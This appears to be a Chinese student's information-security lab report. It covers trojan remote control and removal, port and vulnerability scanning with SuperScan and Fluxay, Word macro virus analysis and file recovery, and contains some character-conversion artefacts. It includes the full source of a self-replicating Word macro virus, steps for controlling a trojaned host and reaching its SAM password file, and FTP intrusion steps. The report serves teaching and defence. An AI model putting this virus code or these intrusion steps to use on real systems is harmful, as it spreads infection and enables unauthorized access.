南昌航空大學(xué)試驗匯報課程名稱：信息安全試驗名稱：共五次試驗 班級：姓名：同組人： 指導(dǎo)教師評定：署名：試驗一木馬攻擊與防范一、試驗?zāi)繕?biāo)經(jīng)過對木馬練習(xí)，使讀者了解和掌握木馬傳輸和運行機(jī)制；經(jīng)過手動刪除木馬，掌握檢驗?zāi)抉R和刪除木馬技巧，學(xué)會防御木馬相關(guān)知識，加深對木馬安全防范意識。二、試驗原理木馬全稱為特洛伊木馬，源自古希臘神話。木馬是隱藏在正常程序中具備特殊功效惡意代碼，是具備破壞、刪除和修改文件、發(fā)送密碼、統(tǒng)計鍵盤、實施DoS攻擊甚至完全控制計算機(jī)等特殊功效后門程序。它隱藏在目標(biāo)計算機(jī)里，能夠隨計算機(jī)自動開啟并在某一端口監(jiān)聽來自控制端控制信息。1．木馬特征(1)偽裝性(2)隱藏性(3)破壞性(4)竊密性2．木馬入侵路徑木馬入侵主要路徑是經(jīng)過一定坑騙方法，如更改圖標(biāo)、把木馬文件與普通文件合并，坑騙被攻擊者下載并執(zhí)行做了手腳木馬程序，就會把木馬安裝到被攻擊者計算機(jī)中。3．木馬種類(1)按照木馬發(fā)展歷程，能夠分為4個階段：第1代木馬是偽裝型病毒，第2代木馬是網(wǎng)絡(luò)傳輸型木馬，第3代木馬在連接方式上有了改進(jìn)，利用了端口反彈技術(shù)，比如灰鴿子木馬，第4代木馬在進(jìn)程隱藏方面做了較大改動，讓木馬服務(wù)器端運行時沒有進(jìn)程，網(wǎng)絡(luò)操作插入到系統(tǒng)進(jìn)程或者應(yīng)用進(jìn)程中完成，比如廣外男生木馬。(2)按照功效分類，木馬又能夠分為：破壞型木馬，主要功效是破壞并刪除文件；服務(wù)型木馬；DoS攻擊型木馬；遠(yuǎn)程控制型木馬三、試驗環(huán)境兩臺運行Windows/XP計算機(jī)，經(jīng)過網(wǎng)絡(luò)連接。使用“冰河”和“廣外男生”木馬作為練習(xí)工具。四、試驗內(nèi)容和結(jié)果任務(wù)一“冰河”木馬使用1．使用“冰河”對遠(yuǎn)程計算機(jī)進(jìn)行控制我們在一臺目標(biāo)主機(jī)上植入木馬，在此主機(jī)上運行G_Server，作為服務(wù)器端；在另一臺主機(jī)上運行G_Client，作為控制端。打開控制端程序，單擊快捷工具欄中“添加主機(jī)”按鈕，彈出如圖1-5所表示對對話框。圖1-5添加計算機(jī)“顯示名稱”：填入顯示在主界面名稱?！爸鳈C(jī)地址”：填入服務(wù)器端主機(jī)IP地址?！霸L問口令”：填入每次訪問主機(jī)密碼，“空”即可?！氨O(jiān)聽端口”：“冰河”默認(rèn)監(jiān)聽端口是7626，控制端能夠修改它以繞過防火墻。單擊“確定”按鈕，即能夠看到主機(jī)面上添加了test主機(jī)，如圖1-6所表示。圖1-6添加test主機(jī)這時單擊test主機(jī)名，假如連接成功，則會顯示服務(wù)器端主機(jī)上盤符。圖1-6顯示了test主機(jī)內(nèi)盤符，表示連接成功。這時我們就能夠像操作自己電腦一樣操作遠(yuǎn)程目標(biāo)電腦，比如打開C:\WINNT\system32\config目錄能夠找到對方主機(jī)上保留用戶口令SAM文件?！氨印贝蟛糠止πФ际窃谶@里實現(xiàn)，單擊“命令控制臺”標(biāo)簽，彈出命令控制臺界面，如圖1-7所表示。圖1-7命令控制臺界面能夠看到，命令控制臺分為“口令類命令”、“控制類命令”、“網(wǎng)絡(luò)類命令”、“文件類命令”、“注冊表讀寫”、“設(shè)置類命令”。3．刪除“冰河”木馬任務(wù)二“廣外男生”木馬使用查看插入進(jìn)程刪除注冊表中木馬文件刪除注冊表中木馬文件五，試驗感想經(jīng)過此次試驗了解一些木馬傳輸技巧，經(jīng)過自己動手實踐，刪除木馬，學(xué)會了防御木馬一些基本技巧，加深了網(wǎng)絡(luò)安全認(rèn)識。試驗二網(wǎng)絡(luò)端口掃描一、試驗?zāi)繕?biāo)經(jīng)過練習(xí)使用網(wǎng)絡(luò)端口掃描器，能夠了解目標(biāo)主機(jī)開放端口和服務(wù)程序，從而獲取系統(tǒng)有用信息，發(fā)覺網(wǎng)絡(luò)系統(tǒng)安全漏洞。在試驗中，我們將在Windows操作系統(tǒng)下使用Superscan進(jìn)行網(wǎng)絡(luò)端口掃描試驗，經(jīng)過端口掃描試驗，能夠增強學(xué)生在網(wǎng)絡(luò)安全方面防護(hù)意識。利用綜合掃描軟件“流光”掃描系統(tǒng)漏洞并給出安全性評定匯報。二、試驗原理(一)．端口掃描原理一個開放網(wǎng)絡(luò)端口就是一條與計算機(jī)進(jìn)行通信信道，對網(wǎng)絡(luò)端口掃描能夠得到目標(biāo)計算機(jī)開放服務(wù)程序、運行系統(tǒng)版本信息，從而為下一步入侵做好準(zhǔn)備。對網(wǎng)絡(luò)端口掃描能夠經(jīng)過執(zhí)行手工命令實現(xiàn)，但效率較低；也能夠經(jīng)過掃描工具實現(xiàn)，效率較高。掃描工具是對目標(biāo)主機(jī)安全性弱點進(jìn)行掃描檢測軟件。它通常具備數(shù)據(jù)分析功效，經(jīng)過對端口掃描分析，能夠發(fā)覺目標(biāo)主機(jī)開放端口和所提供服務(wù)以及對應(yīng)服務(wù)軟件版本和這些服務(wù)及軟件安全漏洞，從而能及時了解目標(biāo)主機(jī)存在安全隱患。1．端口基礎(chǔ)知識端口是TCP協(xié)議中所定義，TCP協(xié)議經(jīng)過套接字(socket)建立起兩臺計算機(jī)之間網(wǎng)絡(luò)連接。TCP／UDP端口號在0～65535范圍之內(nèi)，其中1024以下端口保留給慣用網(wǎng)絡(luò)服務(wù)。比如，21端口為FTP服務(wù)，23端口為TELNET服務(wù)，25端口為SMTP服務(wù)，80端口為HTTP服務(wù)，110端口為POP3服務(wù)等。2．掃描原理掃描方式有多個，為了了解掃描原理，需要對TCP協(xié)議簡明介紹一下。一個TCP頭數(shù)據(jù)包格式如圖2-1所表示。它包含6個標(biāo)志位，其中：圖2-1TCP數(shù)據(jù)包格式掃描往往是入侵前奏，所以怎樣有效屏蔽計算機(jī)端口，保護(hù)本身計算機(jī)安全，成為計算機(jī)管理人員首要考慮問題。為了預(yù)防對計算機(jī)網(wǎng)絡(luò)端口掃描，我們能夠采取端口掃描監(jiān)測工具來監(jiān)測對端口掃描，預(yù)防端口信息外露。慣用端口掃描監(jiān)測工具包含ProtectX、PortSentry等。另外，安裝防火墻也是預(yù)防端口掃描有效方法。三、試驗環(huán)境兩臺預(yù)裝Windows/XP計算機(jī)，經(jīng)過網(wǎng)絡(luò)相連。SuperScan和流光Fluxay軟件。四、試驗內(nèi)容和步驟任務(wù)一使用SuperScan掃描SuperScan具備端口掃描、主機(jī)名解析、Ping掃描功效，其界面如圖2-2所表示。1．主機(jī)名解析功效在HostnameLookup欄中，能夠輸入IP地址或者需要轉(zhuǎn)換域名，單擊Lookup按鈕就能夠取得轉(zhuǎn)換后結(jié)果；單擊Me按鈕能夠取得當(dāng)?shù)赜嬎銠C(jī)IP地址；單擊Interfaces按鈕能夠取得當(dāng)?shù)赜嬎銠C(jī)IP地址詳細(xì)設(shè)置。2．端口掃描功效圖2-2SuperScan操作界面圖2-3端口配置界面SuperScan也提供了特定端口掃描功效，在ScanType欄中選中Allselectportsinlist，就能夠按照選定端口掃描。3．Ping功效SuperScan軟件Ping功效提供了檢測在線主機(jī)和判斷網(wǎng)絡(luò)情況作用。經(jīng)過在IP欄中輸入起始和結(jié)束IP地址，然后選中ScanType欄中Pingonly即可單擊Start開啟Ping掃描了。任務(wù)二利用流光綜合掃描流光是一款非常優(yōu)異綜合掃描工具，不但具備完善掃描功效，而且自帶了很多猜測器和入侵工具，可方便地利用掃描漏洞進(jìn)行入侵。開啟后，主界面如圖2-4所表示。圖2-4主界面1.掃描主機(jī)漏洞(1)圖2-5掃描設(shè)置選項然后，陸續(xù)單擊“下一步”按鈕，會彈出POP3版本信息和用戶密碼對話框以及獲取FTPBanner、嘗試匿名登錄等對話框，可依照需要進(jìn)行選擇，本例以采取默認(rèn)值。圖2-7IPC設(shè)置選項“下一步”，設(shè)置對IIS漏洞掃描選項。之后點擊“下一步”，彈出如圖2-8所表示對話框，這里流光提供了11個漏洞掃描。可依照需要進(jìn)行選擇。圖2-8PLUGINS設(shè)置選項圖2-9選項對話框圖2-10選擇掃描引擎選擇默認(rèn)當(dāng)?shù)刂鳈C(jī)作為掃描引擎，單擊“開始”按鈕開始掃描，經(jīng)過一段時間后，會有類似掃描結(jié)果。2.分析掃描結(jié)果并模擬入侵(1)端口漏洞分析我們發(fā)覺被掃描主機(jī)開放端口，有些開放端口是極其不安全，下面列舉部分端口及其可能存在威脅以下：端口21：FTP端口，攻擊者可能利用用戶名和密碼過于簡單，甚至能夠匿名登錄漏洞登錄到目標(biāo)主機(jī)上，并上傳木馬或者病毒而控制目標(biāo)主機(jī)。端口23：Telnet端口，假如目標(biāo)主機(jī)開放23端口，但用戶名和密碼過于簡單，攻擊者破解后就能夠登錄主機(jī)并查看任何信息，甚至控制目標(biāo)主機(jī)。端口80：HTTP端口，此端口開放沒有太大危險，但假如目標(biāo)主機(jī)有SQL注入漏洞，攻擊者就可能利用端口80進(jìn)行攻擊。端口139：NETBIOS會話服務(wù)端口，主要用于提供Windows文件和打印機(jī)共享以及Unix中Samba服務(wù)。139端口能夠被攻擊者利用，建立IPC連接入侵目標(biāo)主機(jī)，然后取得目標(biāo)主機(jī)root權(quán)限并放置木馬。端口443：網(wǎng)頁瀏覽端口，主要用于HTTPS服務(wù)，是提供加密和經(jīng)過安全端口傳輸另一個HTTP。HTTPS服務(wù)通常是經(jīng)過SSL來確保安全性，不過SSL漏洞可能會受到黑客攻擊，比如能夠黑掉在線銀行系統(tǒng)、盜取信用卡帳好等。端口3389：這個端口開放使安裝了終端服務(wù)和全拼輸入法Windows服務(wù)器（sp1之前版本）存在著遠(yuǎn)程者很輕易拿到Administrator組權(quán)限。(2)FTP漏洞分析當(dāng)掃描結(jié)果中看到FTP端口開放，且能夠匿名登錄，我們就直接利用“流光”提供入侵菜單進(jìn)行FTP登錄，單擊密碼破解成功賬號，然后選擇connect，直接經(jīng)過FTP連接到目標(biāo)主機(jī)上。這么就能夠往目標(biāo)主機(jī)上傳任何文件。包含木馬和病毒，可見FTP匿名登錄危害性。利用help命令，查看ftp命令五、試驗感想此次試驗，在Windows操作系統(tǒng)中安裝并運行SuperScan，掃描目標(biāo)主機(jī)端口，嗅探網(wǎng)絡(luò)服務(wù)和操作系統(tǒng)，提交掃描步驟和掃描結(jié)果，在Windows操作系統(tǒng)中安裝并運行“流光”，查看并統(tǒng)計自己機(jī)器掃描結(jié)果，是否存在安全漏洞，學(xué)習(xí)net相關(guān)命令使用，嘗試?yán)孟到y(tǒng)漏洞與目標(biāo)主機(jī)建立連接試驗三腳本病毒和宏病毒分析一、試驗?zāi)繕?biāo)經(jīng)過這項試驗意在使學(xué)生掌握Office下宏病毒基本原理，主要包含它傳染機(jī)制、破壞機(jī)制以及怎樣去除Office下宏病毒。二、試驗環(huán)境操作系統(tǒng)環(huán)境：Windows98/NT//XP編程環(huán)境：OfficeVBA三、試驗基礎(chǔ)知識要求OfficeVBA編程環(huán)境四、試驗任務(wù)1．任務(wù)性質(zhì)：驗證性試驗2．任務(wù)描述：下面示例中給出是一個Word宏病毒示例程序（只有傳染模塊），仔細(xì)閱讀源程序，掌握Word宏病毒傳染過程。3．任務(wù)步驟：（1）打開Word，新建一個文檔名為“test”；（2）點擊“工具－宏－宏”，在對話框“宏位置”選擇“test”，在宏名中輸入“autoclose”，然后點擊“創(chuàng)建”按鈕；（3）在VBA編輯環(huán)境中輸入示例程序中給出代碼，并保留，然后退出VBA；（4）點擊“工具－宏－宏”，在對話框中點擊“管理器”按鈕，在管理器對話框中點擊“宏方案項”標(biāo)簽；在宏方案項有效范圍“test.doc”中將“NewMacros”更名為“AOPEDMOK”；（5）點擊“工具－宏－安全性”，在安全性對話框中安全級標(biāo)簽中選擇“低”，在可靠性起源標(biāo)簽中選擇“信任對VB項目標(biāo)訪問”；（6）保留并關(guān)閉“test”文檔；（7）新建一個文檔test1，關(guān)閉后重新打開，觀察test1是否被感染。（8）去除此宏病毒，即要同時刪除normal模板、全部活動模板、和染毒文件autoclose宏。4．示例程序Subautoclose()'autocloseMacro'宏在-8-26由jingjd創(chuàng)建OnErrorResumeNextApplication.DisplayAlerts=wdAlertsNoneApplication.EnableCancelKey=wdCancelDisabledApplication.DisplayStatusBar=False'Options.VirusProtection=FalseOptions.SaveNormalPrompt=FalseConstVirusName="AOPEDMOK"'MsgBoxActiveDocument.VBProject.VBComponents.Item(2).Name'MsgBoxActiveDocument.VBProject.VBComponents(2).NameSetDoc=ActiveDocument.VBProject.VBComponentsSetTmp=NormalTemplate.VBProject.VBComponentsConstExportSource="E:\aopedmok.txt"Forj=1ToDoc.CountIfDoc(j).Name=VirusNameThenDocInstalled=1Doc(j).ExportExportSourceEndIfNextjFori=1ToTmp.CountIfTmp(i).Name=VirusNameThenTmpInstalled=1Tmp(i).ExportExportSourceEndIfNextiIfTmpInstalled=0ThenTmp.ImportExportSourceNormalTemplate.SaveEndIfIfDocInstalled=0ThenDoc.ImportExportSourceActiveDocument.SaveAsActiveDocument.FullNameEndIfMsgBox"HaHa,youareattacked!",0,"Word,Macro"EndSub五、試驗結(jié)果1．首選方法：用最新版反病毒軟件去除宏病毒。使用反病毒軟件是一個高效、安全和方便去除方法，也是通常計算機(jī)用戶首選方法。不過宏病毒并不象一些廠商或麻痹大意人那樣認(rèn)為有所謂“廣譜”查殺軟件，這方面突出例子就是ETHAN宏病毒。2..應(yīng)急處理方法：用寫字板或WORD6.0文檔作為去除宏病毒橋梁。假如您WORD系統(tǒng)沒有感染宏病毒，但需要打開某個外來、已查出感染有宏病毒文檔，而手頭現(xiàn)有反病毒軟件又無法查殺它們，那么您能夠試驗用下面方法來查殺文檔中宏病毒：打開這個包含了宏病毒文檔（當(dāng)然是啟用WORD中“宏病毒防護(hù)”功效并在宏警告出現(xiàn)時選擇“取消宏”），然后在“文件”菜單中選擇“另存為”，將此文檔改存成寫字板（RTF）格式或WORD6.0格式。試驗五、文件恢復(fù)工具使用一、試驗?zāi)繕?biāo)：了解文件被刪除后恢復(fù)方法和原理。二、試驗環(huán)境：一臺安裝有WindowsXP或Windows操作系統(tǒng)主機(jī)和EasyRecovery軟件。三、EasyRecovery軟件概述EasyRecovery是世界著名數(shù)據(jù)恢復(fù)企業(yè)Ontrack技術(shù)杰作。它是一個硬盤數(shù)據(jù)恢復(fù)工具，能夠幫你恢復(fù)丟失數(shù)據(jù)以及重建文件系統(tǒng)。其Professioanl（專業(yè)）版更是囊括了磁盤診療、數(shù)據(jù)恢復(fù)、文件修復(fù)、E-mail修復(fù)等全部4大類目19個項目標(biāo)各種數(shù)據(jù)文件修復(fù)和磁盤診療方案。EasyRecovery不會向你原始驅(qū)動器寫入任何東西，它主要是在內(nèi)存中重建文件分區(qū)表，使數(shù)據(jù)能夠安全地傳輸?shù)狡溆囹?qū)動器中。你能夠從被病毒破壞或是已經(jīng)格式化硬盤中恢復(fù)數(shù)據(jù)。該軟件能夠恢復(fù)大于8.4GB硬盤，支持長文件名。被破壞硬盤中像丟失引導(dǎo)統(tǒng)計、BIOS參數(shù)數(shù)據(jù)塊、分區(qū)表、FAT表和引導(dǎo)區(qū)都能夠由它來進(jìn)行恢復(fù)。功效介紹：1．恢復(fù)被刪除文件在EasyRecovery主界面中選擇“數(shù)據(jù)修復(fù)”，然后選擇DeletedRecovery”進(jìn)入修復(fù)刪除文件向?qū)?，在第一步首先選擇被刪除文件所在分區(qū)，單擊“下一步”按鈕，軟件會對該分區(qū)進(jìn)行掃描，完成后會在窗口左邊窗格中顯示該分區(qū)全部文件夾(包含已刪除文件夾)，右邊窗格顯示已經(jīng)刪除了文件，可先瀏覽到被刪除文件所在文件夾，然后就能夠在右邊文件欄中看到該文件夾下已經(jīng)刪除文件列表，選定要恢復(fù)文件。單擊“下一步”按鈕，先在“恢復(fù)到當(dāng)?shù)仳?qū)動器”處指定恢復(fù)文件所保留位置，這個位置必須是在另外一個分區(qū)中。單擊“下一步”按鈕即開始恢復(fù)文件，最終會顯示文件恢復(fù)相關(guān)信息，單擊“完成”按鈕后，就能夠在設(shè)置恢復(fù)文件所保留位置找到被恢復(fù)文件。文件夾恢復(fù)也和文件恢復(fù)類似，只需選定已被刪除文件夾，其下文件也會被一并選定，其后步驟與文件恢復(fù)完全相同。另外，文件恢復(fù)功效也可由“數(shù)據(jù)修復(fù)”中“AdanceRecovery”來實現(xiàn)。2．恢復(fù)已格式化分區(qū)中文件在主界面“數(shù)據(jù)修復(fù)”中選擇“FormatRecovery”，接下來先選擇已格式化分區(qū)，然后掃描分區(qū)。掃描完成后，可看到EasyRecovery掃描出來文件夾都以DIRXX(X是數(shù)字)命名，打開其下子文件夾，名稱沒有發(fā)生改變，文件名也都是完整，其后步驟也和前面一樣，先選定要恢復(fù)文件夾或文件，然后指定恢復(fù)后文件所保留位置，最終將文件恢復(fù)在指定位置。需要注意是，在每一個已刪除文件后面都有一個“情況”標(biāo)識，用字母來表示，它們含義是不一樣，G表示文件情況良好、完整無缺；D表示文件已經(jīng)刪除；B表示文件數(shù)據(jù)已損壞；S表示文件大小不符?？傊?，假如情況標(biāo)識為G、D、X則表明該文件被恢復(fù)可能性比較大，假如標(biāo)識為B、A、N、S，則表明文件恢復(fù)成功可能性會比較小。3．從損壞分區(qū)中恢復(fù)文件假如分區(qū)和文件目錄結(jié)構(gòu)受損，可使用RAWRecovery從損壞分區(qū)中掃描并搶救出主要文件。RAWRecovery使用文件標(biāo)識搜索算法從頭搜索分區(qū)每個HYPERLIN